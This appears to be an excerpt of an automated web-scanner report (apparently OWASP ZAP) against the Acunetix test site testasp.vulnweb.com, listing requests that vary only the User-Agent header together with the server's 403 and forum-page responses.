| URL | http://testasp.vulnweb.com/avatars |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) |
| Evidence | |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/avatars HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:52 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/avatars |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) |
| Evidence | |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/avatars HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:52 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/avatars |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
| Evidence | |
| Request Header - size: 338 bytes. |
GET http://testasp.vulnweb.com/avatars HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:54 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/avatars |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) |
| Evidence | |
| Request Header - size: 349 bytes. |
GET http://testasp.vulnweb.com/avatars HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:55 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/avatars |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 |
| Evidence | |
| Request Header - size: 407 bytes. |
GET http://testasp.vulnweb.com/avatars HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:56 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/avatars |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | msnbot/1.1 (+http://search.msn.com/msnbot.htm) |
| Evidence | |
| Request Header - size: 312 bytes. |
GET http://testasp.vulnweb.com/avatars HTTP/1.1
Host: testasp.vulnweb.com User-Agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:55 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Default.asp |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| Evidence | |
| Request Header - size: 300 bytes. |
GET http://testasp.vulnweb.com/Default.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:57 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Default.asp |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) |
| Evidence | |
| Request Header - size: 300 bytes. |
GET http://testasp.vulnweb.com/Default.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:57 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Default.asp |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) |
| Evidence | |
| Request Header - size: 300 bytes. |
GET http://testasp.vulnweb.com/Default.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:56 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Default.asp |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
| Evidence | |
| Request Header - size: 322 bytes. |
GET http://testasp.vulnweb.com/Default.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:57 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Default.asp |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) |
| Evidence | |
| Request Header - size: 333 bytes. |
GET http://testasp.vulnweb.com/Default.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:58 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
